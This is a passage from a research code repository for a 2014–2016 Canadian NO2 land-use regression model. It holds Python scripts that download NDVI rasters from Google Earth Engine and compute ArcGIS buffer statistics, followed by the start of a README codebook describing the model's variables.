isComplete = testComplete(inputParams,outputFolder)\n if(isComplete):\n return True\n randID = inputParams['randID']\n latit = inputParams['lat']\n longit = inputParams['longit']\n startYear = inputParams['startYear']\n endYear = inputParams['endYear']\n \n \n \n padding = 0.51 # amount of padding around boundary to add to the raster\n filterBoundaries = ee.Geometry.Rectangle(longit + padding,\n latit + padding,\n longit - padding,\n latit - padding) \n for year in range(startYear,endYear+1):\n yearFolder = outputFolder + str(year)\n zipFile = yearFolder + \"/\"+ str(randID) + \".zip\" \n download=False\n timeToSleep=2\n while download==False: \n if not(os.path.exists(zipFile)):\n try:\n download = downloadSingleRaster(year,yearFolder,filterBoundaries,reducer,zipFile,timeToSleep)\n except Exception as e:\n print(str(e))\n finally:\n time.sleep(timeToSleep)\n else:\n print(zipFile + \" already exists, did you already download this raster?\") \n download=True\n\n# download one raster\n# INPUTS:\n# year (str) - year of raster coverage\n# yearFolder (str) - full filepath where image will be downloaded\n# filterBoundaries (ee.Geometry.Rectangle) - spatial exxtent of raster to download\n# reducer (ee.Reducer) - custom Google Earth Engine object - defines which type of summar stat to use (e.g. mean)\n# zipFile (str) - full filepath where the zipped raster should be written to \n# OUTPUTS:\n# True if raster download was successful, false otherwise\ndef downloadSingleRaster(year,yearFolder,filterBoundaries,reducer,zipFile,timeToSleep): \n params = {'scale':'30'} # spatial resolution, in units of meters. Finest possible reoslution for MODIS is 250m, for Landsat8 is 30m\n collection = ee.ImageCollection(collectionName)\n imageCatalog = filterCatalogSet(year,filterBoundaries,collection)\n screenedImg = imageCatalog.map(mapMask)\n reducedImage = screenedImg.reduce(reducer)\n clippedImage = reducedImage.clip(filterBoundaries)\n url = clippedImage.getDownloadURL(params)\n print(\"the url to download is \" + url) \n try:\n if(os.path.exists(yearFolder) == False):\n os.mkdir(yearFolder) \n f = open(zipFile ,'wb')\n f.write(urllib2.urlopen(url,timeout= 10*6).read())\n f.close() \n zip_ref = zipfile.ZipFile(zipFile, 'r')\n zip_ref.extractall(yearFolder)\n zip_ref.close()\n return(True) \n except Exception as e:\n print(str(e))\n if(str(e) == \"HTTP Error 400: Bad Request\"):\n return(True)\n time.sleep(timeToSleep)\n timeToSleep = min(60,timeToSleep+10)\n print(timeToSleep)\n try:\n f.close()\n except Exception as e:\n print(e)\n if(os.path.exists(zipFile)):\n os.remove(zipFile)\n return(False)\n\n# map an NDVI calculation and mask function to apply to each image in the NDVI dataset\n# Inputs:\n# image (Google Earth Engine image object) - raster image to apply the NDVI calculation\n# and mask function to\n# Outputs:\n# image (Google Earth Engine image object) - NDVI values of the input image after applying\n# the cloud and water mask\ndef mapMask(image):\n #ndvi = ee.Image(image).select('NDVI')\n #fmaskVals = ee.Image(image).select('SummaryQA')\n validVals = [0,1]\n #screenedImg = ee.Image(fmaskVals).neq(-1)\n #screenedImg3 = ee.Image(fmaskVals).neq(2)\n #screenedImg4 = ee.Image(fmaskVals).neq(3)\n\n screenedImg = ee.Image(image).updateMask(waterMaskScreen)\n return screenedImg\n\n\n\n# process downloaded NDVI raster so ArcGIS properly recognizes null values as \"NULL\"\n# Inputs:\n# inputFolder (string) - folder containing .tif images to process\n# outputFolder (string) - folder containing input .tif images with NULL values \n# recognizable by ArcGIS\ndef createRasters(inputFolder,outputFolder):\n filesToProcess = os.listdir(inputFolder)\n fileList = []\n # for each file in the folder, change exact 0 values to NULL\n for filename in filesToProcess:\n if(filename[len(filename)-3:len(filename)] == \"tif\"):\n fileList.append(filename)\n for filename in fileList:\n outSetNull = arcpy.sa.SetNull(inputFolder + filename, inputFolder + filename, \"VALUE = 0\") \n outputName = outputFolder + filename[2:len(filename)-4] + \"null\"\n outSetNull.save(outputName.replace('.','')+ \".tif\")\n\n# get data from a single row of a pandas dataframe\n# INPUTS:\n# rawData (pandas df) - contains raw data to read from\n# index (int) - row number to read\n# startYear (int) - first year of data coverage\n# endYear (int) - last year of data coverage\n# OUTPUTS:\n# tempDict (dictionary)\n# randID (int) - id previously assigned randomly to row instance\n# lat (float) - latitude coordinate\n# longit (float) - longitude coordinate\n# startYear (int) - starting year of data coverage\n# endYear (int) - ending year of data coverage\ndef getRowData(rawData,index,startYear,endYear):\n tempRow = rawData.iloc[index]\n print(tempRow.head())\n tempRandID = int(tempRow[CSV_DICT[0]])\n tempLat = tempRow[CSV_DICT[1]]\n tempLong = tempRow[CSV_DICT[2]]\n tempDict = {'randID':tempRandID,'lat':tempLat,'longit':tempLong,'startYear':startYear,'endYear':endYear}\n return(tempDict)\n\n# test all zipped files in an input folder for correctness and remove corrupted files\n# INPUTS:\n# inputFolder (str) - folder containing zip files to test (and clean)\ndef cleanZip(inputFolder):\n candidateZips = os.listdir(inputFolder)\n for candidate in candidateZips:\n if(candidate[len(candidate)-3:len(candidate)] == \"zip\"):\n try:\n a = zipfile.ZipFile(inputFolder + \"/\" + candidate)\n if(len(a.namelist()))==0:\n del(a)\n os.remove(inputFolder + \"/\" + candidate) \n except:\n print(\"removing file \" + candidate)\n os.remove(inputFolder + \"/\" + candidate)\n\n\n# perform focal statistics on a single raster\n# INPUTS:\n# inputRaster (str) - full filepath to the raster\n# numCells (int) - radius of the focal statistics, in number of cells\n# outputFile (str) - full filepath where the output focal statistics raster will be written\ndef focalStatsOnOneRaster(inputRaster,numCells, outputFile):\n outRaster = arcpy.sa.FocalStatistics(inputRaster, arcpy.sa.NbrCircle(numCells, \"CELL\"), \"MEAN\", \"DATA\")\n outRaster.save(outputFile)\n\n# perform focal statistics on all rasters located within a given input folder\n# INPUTS:\n# inputFolder (str) - folder where rasters to perform focal stats on are stored\n# numCells (int) - radius of the focal statistics, in number of cells\n# outputFolder (str) - full filepath where the output focal statistics raster will be written\ndef focalStatisticsAllRasters(inputFolder,numCells,outputFolder):\n candidateFiles = os.listdir(inputFolder)\n filesToProcess = []\n for candidateFile in candidateFiles:\n if(candidateFile[len(candidateFile)-3:len(candidateFile)] == \"tif\"):\n outputFile = outputFolder + \"/\" + candidateFile[0:len(candidateFile)-8] + \".tif\"\n if not (os.path.exists(outputFile)):\n print(outputFile)\n focalStatsOnOneRaster(inputFolder + \"/\" + candidateFile, numCells,outputFile)\n else:\n print(outputFile + ' already exists')\n\n\n# merge multiple rasters into a single mosaiced raster\n# INPUTS:\n# inputFolder (str) - folder containing all rasters to merge\n# year (int) - year all rasters represent - used in mosaic filename\ndef mergeRasters(inputFolder,year):\n candidateFiles = os.listdir(inputFolder)\n filesToMerge = []\n for candidateFile in candidateFiles:\n if(candidateFile[len(candidateFile)-3:len(candidateFile)] == \"tif\"):\n filesToMerge.append(inputFolder + \"/\" + candidateFile)\n print(filesToMerge)\n \n arcpy.MosaicToNewRaster_management( \n input_rasters=filesToMerge, output_location=parentFolder, \n raster_dataset_name_with_extension=\"uNDVIx\" + str(year) + \".tif\", \n coordinate_system_for_the_raster=\"\", \n pixel_type=\"32_BIT_FLOAT\", cellsize=\"\", \n number_of_bands=\"1\", \n mosaic_method=\"MAXIMUM\", \n mosaic_colormap_mode=\"FIRST\"\n )\n\n\n#################### main function #############\n\n# download all MODIS NDVI rasters for all years and all locations\n# INPUTS:\n# rawData (dataframe) - pandas dataframe containing data read from csv\n# reducerType (str) - type of ee.Reducer to create: mean or max\n# unscreenedRasterFolder (str) - folder where downloaded rasters will be stored\n# startYear (int) - starting year of data coverage\n# endYear (int) - ending year of data coverage\ndef downloadNDVI_All_Years(rawData, reducerType,unscreenedRasterFolder,startYear,endYear):\n for i in range(startYear,endYear+1):\n if(os.path.exists(unscreenedRasterFolder + str(i))):\n cleanZip(unscreenedRasterFolder + str(i))\n if(reducerType==\"MEAN\"):\n reducer = ee.Reducer.mean()\n else:\n reducer = ee.Reducer.max()\n for index in range(1,rawData.count()[1]): \n downloadSinglePoint(getRowData(rawData,index,startYear,endYear),reducer,unscreenedRasterFolder)\n \n \n\ndef main():\n rawData = pd.read_csv(inputCSVFile)\n #screenedRasterFolder = parentFolder + \"screenedMean/\"\n #unscreenedRasterFolder =parentFolder + \"unscreenedMean/\" \n #downloadMODIS_All_Years(rawData,\"MEAN\",unscreenedRasterFolder,START_YEAR,END_YEAR)\n screenedRasterFolder = parentFolder + \"screenedMax/\"\n unscreenedRasterFolder =parentFolder + \"unscreenedMax/\" \n downloadNDVI_All_Years(rawData,\"MAX\",unscreenedRasterFolder,START_YEAR,END_YEAR) \n\n#main()\n\n\n#for i in range(START_YEAR,END_YEAR+1):\n# outputFile = parentFolder + \"/uNDVIx\" + str(i) + \".tif\"\n# if not os.path.exists(outputFile):\n# mergeRasters(parentFolder + \"unscreenedMax/\" + str(i),i)\nscreenedRasterFolder = parentFolder + \"screenedMax/\"\nunscreenedRasterFolder =parentFolder + \"unscreenedMax/\" \ncreateRasters(unscreenedRasterFolder,screenedRasterFolder)\n\n\n \n#focalStatisticsAllRasters(parentFolder + \"/screenedMax\", 1, parentFolder+ \"MaxNDVIFocal/x250\")\n#focalStatisticsAllRasters(parentFolder + \"/screenedMax\", 2, parentFolder + \"MaxNDVIFocal/x500\")\n#focalStatisticsAllRasters(parentFolder + \"/screenedMax\", 4, parentFolder+ \"MaxNDVIFocal/x1000\")\n\n\n############### end of downloadGreenspace.py ################" }, { "alpha_fraction": 0.6684962511062622, "alphanum_fraction": 0.6732752919197083, "avg_line_length": 49.80529022216797, "blob_id": "5f55cf893aaca3014b5f92e1b83f5df17ebfa9aa", "content_id": "dfdd6a3a1d0de5bbbce1833278487a772953092f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21134, "license_type": "permissive", "max_line_length": 208, "num_lines": 416, "path": "/Processing Scripts/bufferFunctions_Canada_LUR.py", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "################# BufferVariables.py ##################\n#\n# Contains functions for automating several ArcGIS functions during the development of a Land Use Regression model.\n# Functions include generating a series of buffers around points in a shapefile, determining polyline length within each unique buffer,\n# and determining arverage raster values within the buffer.\n#\n# Author: Andrew Larkin\n# Created for: Perry Hystad, Oregon State University\n# Last modified: 12/08/2014\n#\n# Requirements:\n# ArcGIS with spatial extension (tested on ArcGIS v. 10.2)\n# ArcGIS comptabile version of python (tested with Python v. 2.7)\n# Python integrated development environment is highly recommended but not required\n# StatisticsForOverlappingZones.py script (provided by NOAA) is required for the batchRasterBufferIntersect function\n# constantvalues.py conatins all modifiable input values (e.g. input files, folder locations)\n\n\n############## import required modules ###############\nimport arcpy\nfrom arcpy import sa\narcpy.CheckOutExtension(\"spatial\")\narcpy.env.overwriteOutput = True\nfrom arcpy import env\nimport StatisticsForOverlappingZones as overlap\nimport constantValues as values\nimport gc\nimport os\nimport math\nimport time\nimport sys\nimport shutil\nimport constantValues\n############## end of module import ##################\n\n\n\n################# functions ##################################\n\n# determine the unique number assigned to the partition dataset in process\ndef determineAirMonitorIdentifier(airMonitorPartitionFile):\n startLocation = airMonitorPartitionFile.rfind(values.KEYWORD) + len(values.KEYWORD) \n endLocation = airMonitorPartitionFile.find(\".shp\")\n identifier = airMonitorPartitionFile[startLocation:endLocation]\n print(\"this air monitor's identity is \" + str(identifier))\n return identifier\n### end of determineAirMonitorIdentifier\n\n\ndef assignZones():\n #relpath = os.path.dirname(os.path.realpath(__file__))\n zoneDefined = values.RESULTS_FOLDER + \"w_zones.shp\"\n print(\"defined zoneDefined\")\n arcpy.SpatialJoin_analysis(values.INPUT_FOLDER + values.MONITOR_FILE,values.INPUT_FOLDER + values.ZONE_DEFINITIONS,zoneDefined,\"JOIN_ONE_TO_ONE\",\"KEEP_ALL\",\"#\",\"CLOSEST\",\"#\",\"#\")\n print(\"completed zone assignments\")\n return zoneDefined\n\n\n# calculate point values for air monitoring stations\ndef runPointAnalysis(airMonitorFile, pointList):\n #calculate distance from coast to air monitor location\n #arcpy.Near_analysis(values.INPUT_FOLDER + values.MONITOR_FILE, values.INPUT_FOLDER + \n # values.COAST_BOUNDARY,search_radius=\"#\",location=\"NO_LOCATION\",angle=\"NO_ANGLE\",method=\"PLANAR\") \n rasterArgumentsList = \"\"\n # for each raster file used as point value data source, add it to the extract multivalues list and run extractMutliValues with arcpy\n if(len(pointList) >0):\n for pointFile in pointList:\n rasterArgument = values.INPUT_FOLDER + pointFile\n outputFile = values.RESULTS_FOLDER + \"pointAnalysisTemp.shp\"\n arcpy.sa.ExtractValuesToPoints(airMonitorFile, rasterArgument,values.RESULTS_FOLDER + \"pointAnalysisTemp.shp\", \"NONE\")\n arcpy.AddField_management(outputFile, pointFile[0:2], \"DOUBLE\", \"\", \"\")\n expression2 = \"!\" + \"RASTERVALU\" + \"! * 1\"\n arcpy.CalculateField_management(outputFile, pointFile[0:2], expression2, \"PYTHON\")\n arcpy.DeleteField_management(outputFile, \"RASTERVALU\")\n arcpy.CopyFeatures_management(outputFile, airMonitorFile) \n else:\n print(\"there are no point variables to process\")\n print(\"completed calculating point values for the air monitor data set\")\n### end runPointAnalysis ###\n\ndef testProgress(result):\n print(\"we're testing progress\")\n timeDif = 0\n while(timeDif <values.RATER_PROCESS_WAIT_TIME):\n try:\n result.get(timeout=values.RATER_PROCESS_WAIT_TIME)\n if(result.successful()==True):\n break \n except Exception as e:\n print(\"timeout\" + str(e))\n #print(os.path.getmtime(\"E:/pyResults2/tempStats/teworkfile.txt\"))\n timeDif = time.time() - os.path.getmtime(values.RESULTS_FOLDER + values.TEMP_STATS_WORKSPACE + \"/\" + values.TEST_PROGRESS_FILE)\n print(timeDif)\n print(\"multiprocessing has either completed or stopped progress\")\n\n\ndef determineAirMonitorZone(airMonitorPartitionFile):\n startLocation = airMonitorPartitionFile.rfind(values.ZONE_KEYWORD)\n endLocation = airMonitorPartitionFile.rfind(values.PARTITION_KEYWORD)\n zoneIdentifier = airMonitorPartitionFile[startLocation+1:endLocation]\n return zoneIdentifier\n### end of determineAirMonitorZone\n\n\ndef determineMosaicFile(mosaicFolder, zoneIdentifier, fileType):\n selectFile=[]\n fileList = os.listdir(values.INPUT_FOLDER + mosaicFolder)\n if fileType == values.RASTER_TYPE or fileType == values.POINT_TYPE:\n extension = \".tif\"\n elif(fileType == values.POLYLINE_TYPE):\n extension = \".shp\"\n fileList = os.listdir(values.INPUT_FOLDER + mosaicFolder)\n for file in fileList:\n startLocation = file.rfind(\"z\")\n endLocation = file.rfind(extension)\n zoneValue = file[startLocation+1:endLocation]\n if zoneValue == zoneIdentifier:\n #print(\"the file for the zone value is: \" + file[0:endLocation] + extension)\n selectFile = mosaicFolder + \"/\" + file[0:endLocation] + extension \n return selectFile\n\n# partition a shapefile with a large number of air monitoring stations into several shapefiles with a smaller\n# number of monitoring stations per file\ndef partitionShapefile(airMonitorFile):\n newPath = values.RESULTS_FOLDER\n shapeFileList = []\n with arcpy.da.SearchCursor(airMonitorFile,\"zone\") as cursor: \n for zone in sorted({row[0] for row in cursor}):\n whereClause = '\"zone\" = ' + str(zone) \n print(zone)\n tempFile = newPath + \"spat_join_temp.shp\"\n lyr = arcpy.MakeFeatureLayer_management(airMonitorFile)\n arcpy.Select_analysis(lyr, tempFile, whereClause)\n getCount = int(arcpy.GetCount_management(tempFile).getOutput(0))\n numPartitions = int(math.ceil(float(getCount)/values.PARTITION_SIZE))\n print(\"the number of partitions for zone \" + str(zone) + \"is \" + str(numPartitions))\n for i in range(0,numPartitions):\n newPath = values.RESULTS_FOLDER + \"/\" + values.KEYWORD + \"z\" + str(zone) + \"i\" + str(i)\n if not os.path.exists(newPath): os.makedirs(newPath) \n outputFileName =newPath + \"/\" + values.KEYWORD + \"z\" + str(zone) + \"i\" + str(i) + \".shp\"\n whereClause = '\"FID\" >= ' + str(i*values.PARTITION_SIZE) + ' AND \"FID\" < ' + str(min(getCount+1, (i+1)*values.PARTITION_SIZE))\n print(whereClause)\n arcpy.Select_analysis(tempFile, outputFileName, whereClause)\n print(\"created partition zone \" + str(zone) + \", id \" + str(i))\n shapeFileList.append(outputFileName)\n print(\"completed zone \" + str(zone))\n print(\"finished paritionShapeFile\")\n print(shapeFileList) \n return(shapeFileList)\n \n\n\n\n\n\n\n\n# add varaible values to the partition air monitor shapefile\ndef addVariableToPartition(argument, airMonitor,valueType):\n bufferIndex = str(argument[0]).rfind(\"buffer\") + 6\n variableIdent = argument[0][bufferIndex:-4]\n if(valueType == values.RASTER_TYPE):\n valueFile = argument[2] + variableIdent + \".shp\"\n arcpy.JoinField_management(airMonitor,\"FID\",valueFile,values.AIRMONITOR_ID,variableIdent)\n elif(valueType == values.POLYLINE_TYPE):\n valueFile = argument[2] + variableIdent + \"d.shp\"\n arcpy.JoinField_management(airMonitor,\"FID\",valueFile,values.BUFFER_ID,variableIdent)\n elif(valueType == values.POINT_BUFFER_TYPE):\n valueFile = argument[2] + variableIdent + \"d.shp\"\n arcpy.JoinField_management(airMonitor,\"FID\",valueFile,values.BUFFER_ID,variableIdent) \n print (\"completed adding the \" + variableIdent + \" to the air monitor partition \" + airMonitor)\n### end of addVariableToPartition\n\n\n# make a buffer of given input distance from the points in the given input file. \n# write the results into the designated outputFolder\ndef makeBuffer(bufferDistance, inputFile, dataFolderOut): \n # for each bufferDistance to be created, run through the ArcGIS buffer analysis tool and create an output .shp file \n inputFilePath = inputFile\n outputFile = \"buffer\" + str(bufferDistance) + \"m.shp\"\n outputFilePath = dataFolderOut + outputFile\n buffDistance = str(bufferDistance) + \" Meters\"\n if(os.path.exists(outputFilePath)):\n print(\"warning: \" + outputFilePath + \"already exists. File will be overwritten\")\n arcpy.Buffer_analysis(in_features=inputFilePath,out_feature_class=outputFilePath,buffer_distance_or_field=buffDistance,\n line_side=\"FULL\",line_end_type=\"ROUND\",dissolve_option=\"NONE\",dissolve_field=\"#\")\n #print (\"completed making the \" + str(bufferDistance) + \"m buffer\")\n return outputFilePath # return the list of generated output files\n### end of makeBuffer ### \n\n\n# create buffer shapefiles and a folder to store them in\ndef makeMultipleBuffers(partitionFile):\n startLocation = partitionFile.rfind(values.KEYWORD) + len(values.KEYWORD)\n endLocation = partitionFile.find(\".shp\")\n identifier = partitionFile[startLocation:endLocation] \n partitionFolderOut = values.RESULTS_FOLDER + values.KEYWORD + identifier\n bufferFolder = partitionFolderOut + values.BUFFER_EXTENSION\n if not os.path.exists(bufferFolder): os.makedirs(bufferFolder)\n for buffer in values.BUFFER_DISTANCE:\n makeBuffer(buffer,partitionFile, bufferFolder)\n### end of makeBuffers\n\n# create a copy of the buffer file for each parallel processing thread\ndef createBufferFileCopy(masterBufferFile, variable, identifier, buffer, partitionFolderOut):\n tempFileName = \"buffer\" + variable[0] + variable[1] + buffer + \"m.shp\"\n tempBufferFile = partitionFolderOut + values.BUFFER_EXTENSION + tempFileName\n arcpy.CopyFeatures_management(masterBufferFile, tempBufferFile)\n return tempBufferFile\n### end of createBufferFileCopy\n\n\n# create a list of arguments to pass into the wrapper function for parallel processing of a variable\ndef createArgumentList(variableList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor):\n argumentList = []\n for variable in variableList: # for each variable that we want to proces (i.e. included in the list)\n variableIdent = variable[0] + variable[1]\n variableOutputFolder = partitionFolderOut + variable[0] + variable[1] + \"/\" \n tempBufferFile = createBufferFileCopy(masterBufferFile, variable, identifier, str(buffer), partitionFolderOut)\n # add the created list of arguments to the master list of arguments to be used in the call for parallel processing\n argumentList.append([tempBufferFile, values.INPUT_FOLDER + variable, variableOutputFolder, airMonitor, str(buffer)]) \n print(\"completed making arguments for parallel processing of buffer varaible analysis\")\n return argumentList\n### end of createArguemntList\n\n\n# calculate average values of a polyline file within given buffer areas\ndef polylineBufferIntersect(bufferFile, variableFile, variableOutputFolder, airMonitorFile, bufferSize):\n bufferIndex = str(bufferFile).rfind(\"buffer\") + 6\n variableIndex = str(variableFile).rfind(\"/\") + 1\n variableIdent = bufferFile[bufferIndex:-4]\n fileList = []\n if(os.path.exists(variableOutputFolder)):\n fileList = os.listdir(variableOutputFolder)\n for fileName in fileList:\n if(variableIdent in fileName):\n os.remove(variableOutputFolder + fileName)\n print(\"removed file: \" + variableOutputFolder + fileName)\n intersectFile = variableOutputFolder + variableIdent + \".shp\"\n if(os.path.isfile(intersectFile)):\n os.remove(intersectFile)\n dissolveFile = variableOutputFolder + variableIdent + \"d.shp\"\n if not os.path.exists(variableOutputFolder): os.makedirs(variableOutputFolder) \n tableFile = variableOutputFolder + variableIdent + \".shp\"\n if(os.path.isfile(tableFile)):\n os.remove(tableFile)\n fieldName = variableIdent # new field to add to feature class table \n \n # intersect the buffer\n arcpy.Intersect_analysis(bufferFile +\";\" + variableFile, intersectFile, \"ALL\", \"\", \"INPUT\")\n \n # combine line segments within each buffer zone (overlapping areas are accounted for)\n arcpy.Dissolve_management(intersectFile,dissolveFile,values.BUFFER_ID,\"#\",\"MULTI_PART\",\"DISSOLVE_LINES\") \n \n # create a new field in the dissolved feature class\n arcpy.AddField_management(dissolveFile, fieldName, \"DOUBLE\", \"\", \"\")\n \n # calculate the total length of polyline segments in each unique buffer and store the result in the new field\n arcpy.CalculateField_management(dissolveFile, fieldName, values.LENGTH_COMMAND, \"PYTHON\")\n #avgLengthCommand = \"!shape.length@kilometers! / math.pi / \" + str(float(bufferSize)/1000) + \"**2\"\n #fieldNameNormalized = variableIdent + \"n\"\n #arcpy.AddField_management(dissolveFile, fieldNameNormalized, \"DOUBLE\", \"\", \"\")\n #arcpy.CalculateField_management(dissolveFile, fieldNameNormalized, avgLengthCommand, \"PYTHON\")\n \n \n \n del (bufferFile, variableFile, airMonitorFile, bufferSize, bufferIndex, variableIndex, \n variableIdent, variableOutputFolder, intersectFile, dissolveFile, tableFile, fieldName)\n gc.collect() \n\n\ndef pointBufferIntersect(bufferFile, variableFile, variableOutputFolder, airMonitorFile, bufferSize):\n bufferIndex = str(bufferFile).rfind(\"buffer\") + 6\n variableIndex = str(variableFile).rfind(\"/\") + 1\n variableIdent = bufferFile[bufferIndex:-4]\n intersectFile = variableOutputFolder + variableIdent + \".shp\"\n dissolveFile = variableOutputFolder + variableIdent + \"d.shp\" \n if not os.path.exists(variableOutputFolder): os.makedirs(variableOutputFolder) \n tableFile = variableOutputFolder + variableIdent + \".shp\"\n if(os.path.isfile(tableFile)):\n return \n fieldName = variableIdent # new field to add to feature class table \n \n # intersect the buffer\n arcpy.Intersect_analysis(bufferFile +\";\" + variableFile, intersectFile, \"ALL\", \"\", \"INPUT\")\n \n # combine line segments within each buffer zone (overlapping areas are accounted for)\n # Replace a layer/table view name with a path to a dataset (which can be a layer file) or create the layer/table view within the script\n # The following inputs are layers or table views: \"powerPlants_Intersect\"\n arcpy.Dissolve_management(intersectFile,dissolveFile,values.BUFFER_ID,\"carbon_200 SUM\",\"MULTI_PART\",\"DISSOLVE_LINES\") \n \n # create a new field in the dissolved feature class\n arcpy.AddField_management(dissolveFile, fieldName, \"DOUBLE\", \"\", \"\")\n \n # calculate the total length of polyline segments in each unique buffer and store the result in the new field\n arcpy.CalculateField_management(dissolveFile, fieldName, values.CARBON_COMMAND, \"PYTHON\") \n \n del (bufferFile, variableFile, airMonitorFile, bufferIndex, variableIndex, \n variableIdent, variableOutputFolder, intersectFile, dissolveFile, tableFile, fieldName)\n gc.collect() \n\ndef testFileCompletion(argumentList):\n fileCompletion = True\n for argument in argumentList:\n bufferIndex = str(argument[0]).rfind(\"buffer\") + 6\n variableIdent = argument[0][bufferIndex:-4]\n valueFile = argument[2] + variableIdent + \".shp\"\n testTemp = 0\n if(os.path.isfile(valueFile)):\n for field in arcpy.ListFields(valueFile):\n if(field.name == argument[2] + variableIdent):\n testTemp = 1\n else:\n testTemp = max(testTemp,0)\n fileCompletion = fileCompletion * os.path.isfile(valueFile)\n return(fileCompletion)\n\n# parallel processing natively only accepts a single argument for input. \n# this is a wrapper function to accept a single list of inputs from the parall\ndef multi_run_raster_wrapper(args):\n return rasterBufferIntersect(*args)\n### end of multi_run_wrapper\n\n\n# parallel processing natively only accepts a single argument for input. \n# this is a wrapper function to accept a single list of inputs from the parall\ndef multi_run_polyline_wrapper(args):\n return polylineBufferIntersect(*args)\n### end of multi_run_wrapper\n\n# calculate average values of a raster within various buffer zones in a shapefile\ndef rasterBufferIntersect(bufferFile, variableFile, variableOutputFolder, airMonitorFile, bufferSize):\n continueVar = 1\n var1 = variableFile\n bufferIndex = str(bufferFile).rfind(\"buffer\") + 6\n variableIndex = str(variableFile).rfind(\"/\") + 1\n variableIdent = bufferFile[bufferIndex:-4]\n partitionIdentStart = variableOutputFolder.rfind(\"Partition\") + len(\"Partition\")\n partitionIdentEnd = variableOutputFolder.rfind(\"/\")\n partitionId = variableOutputFolder[partitionIdentStart:partitionIdentEnd]\n if not os.path.exists(variableOutputFolder): os.makedirs(variableOutputFolder)\n tableFile = variableOutputFolder + variableIdent + \".shp\" \n tempTestValue = 1\n while(continueVar==1):\n if(os.path.isfile(tableFile)):\n print(str(tableFile) + \" already exists\")\n sys.stdout.flush()\n for field in arcpy.ListFields(tableFile):\n #print(\"the field name is \" + str(field.name))\n #sys.stdout.flush()\n #print(variableIdent)\n sys.stdout.flush()\n if field.name == variableIdent:\n continueVar = 0\n tempTestValue = 0\n print(\"the field already exists, no need to rerun for variable \" + str(variableIdent))\n sys.stdout.flush()\n return\n if(tempTestValue == 1):\n try:\n os.remove(variableOutputFolder + variableIdent + \".shp\")\n os.remove(variableOutputFolder + variableIdent + \".cpg\")\n os.remove(variableOutputFolder + variableIdent + \".shx\")\n os.remove(variableOutputFolder + variableIdent + \".dbf\")\n os.remove(variableOutputFolder + variableIdent + \".prj\")\n #deleteTest = arcpy.Delete_management(tableFile)\n print(\"deleted corrupt shapefile \" + tableFile )\n except Exception as e:\n print(\"cannot delete shapefile \" + str(tableFile) + str(e))\n sys.stdout.flush()\n if(continueVar==1):\n try: \n raster = arcpy.Raster(var1)\n arcpy.env.cellSize = raster.meanCellHeight/10.0\n expression2 = []\n try:\n continueVar = overlap.runFeatureRasterIntersect(bufferFile, values.TABLE_ID, variableFile, tableFile, variableFile[variableIndex:variableIndex+2],partitionId,str(bufferSize)) \n except:\n print(\"could not run overlap.runfeatureIntersect\")\n try:\n for field in arcpy.ListFields(tableFile, \"*_MEAN\"):\n meanField = field.name\n expression2 = \"!\" + meanField + \"! * 1\"\n #print(\"we finished statistiscs overlapp, mean expression is \" + str(expression2))\n #sys.stdout.flush()\n except:\n expression2 = \"-9999\"\n print(\"-9999 was used\")\n #sys.stdout.flush()\n arcpy.AddField_management(tableFile, variableIdent, \"DOUBLE\", \"\", \"\") \n arcpy.CalculateField_management(tableFile, variableIdent, expression2, \"PYTHON\") \n #sys.stdout.flush()\n print(variableIdent + \" raster for buffer size \" + str(bufferSize) + \" completed\")\n del (bufferFile, variableFile, tableFile, raster, airMonitorFile, bufferSize)\n gc.collect()\n print(\"finished raster analysis\")\n try:\n tempWorkspace = constantValues.RESULTS_FOLDER + constantValues.TEMP_STATS_WORKSPACE + \"/\" + variableFile[variableIndex:variableIndex+2] + str(partitionId) + str(bufferSize) + \"/zonalStats\"\n shutil.rmtree(tempWorkspace)\n except:\n print(\"could not remove the tempworkspace\") \n except Exception as e:\n print(\"raster analysis failed \" + str(e) + \" \" + variableIdent)\n continueVar = 1\n continue\n try:\n sys.stdout.flush()\n except:\n print(\"flush didn't work\")\n continueVar = 0\n### end of rasterBufferIntersect ### \n \n################# end of functions ############################\n\n\n############### end of BufferVariables.py ###############" }, { "alpha_fraction": 0.7154144644737244, "alphanum_fraction": 0.7510415315628052, "avg_line_length": 90.59210205078125, "blob_id": "5fdf8b228a8b37e3b2d827e7e642719b0ac6d9f5", "content_id": "516a8f298a2508778b0fe9213781c4881b288f4a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6961, "license_type": "permissive", "max_line_length": 272, "num_lines": 76, "path": "/Readme.md", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "![GitHub Logo](./Canada_Map.png)\n\n**Author:** [Andrew Larkin](https://www.linkedin.com/in/andrew-larkin-525ba3b5/) <br>\n**Affiliation:** [Oregon State University, College of Public Health and Human Sciences](https://health.oregonstate.edu/) <br>\n**Principal Investigator:** [Perry Hystad](https://health.oregonstate.edu/people/perry-hystad) <br>\n**Date Created:** September 14th, 2018\n\n\n\n### Summary ###\nThis notebook contains the codebook, datasources, and names of R and python scripts used to develop the 2014-2016 three year average LUR NO2 model for Canada. The sections of the notebook are as follows: <br> <br>\n**1 Codebook:** names and characteristics of variables used in the LUR model <br>\n**2 Datasources:** underlying sources of data used to derive the variables in the codebook <br>\n**3 Processing scripts:** names and descriptons of the scripts used to derie variables in the codebook and develop the land use regresson model <br>\n\n### Codebook ####\n\nVariables in the codebook are partitioned into distance-based, point-based, and buffer-based variables. All buffer distances are in meters<br>\n\n#### Distance based variables #### \n- **port_dist** - distance to nearest port. Units: meters. Datatype: Float. Datasource: 5.\n\n#### Point based variables ####\n\n- **elevation** - air monitor elevation level. Units: meters. Datatype: Int. Datasource: 7.\n- **mean_20YY** - annual mean NO2 concentration. Units: ppb. Datatype: Int. Datasource: 7.\n- **meanNO2_2014_2016** - average of annual mean NO2 concentrations from 2014 to 2016. Units: ppb. Datatype: Float. Datasource: 7.\n- **NAPS ID** - air monitor station id. Datatype: Int. Datasource: 7.\n- **numObs** - number of annual mean NO2 concentration measures between 2014 and 2016. Datatype: Int. Datasource: 7.\n- **percent completeness_20YY** - percent air monitor coverage for year YY. Datatype: Int. Datasource: 7.\n- **pr_YY** - annual mean daily precipitation for year YY. Units: nm. Datatpye: Float. Datasource: 1.\n- **pr_14_16** - mean of pr_14, pr_15, and pr_16. Units: nm. Datatype: Float. Datasource: 1.\n- **te_YY** - annual mean daily max temperature for year YY. Units: degrees celcius. Datatype: Float. 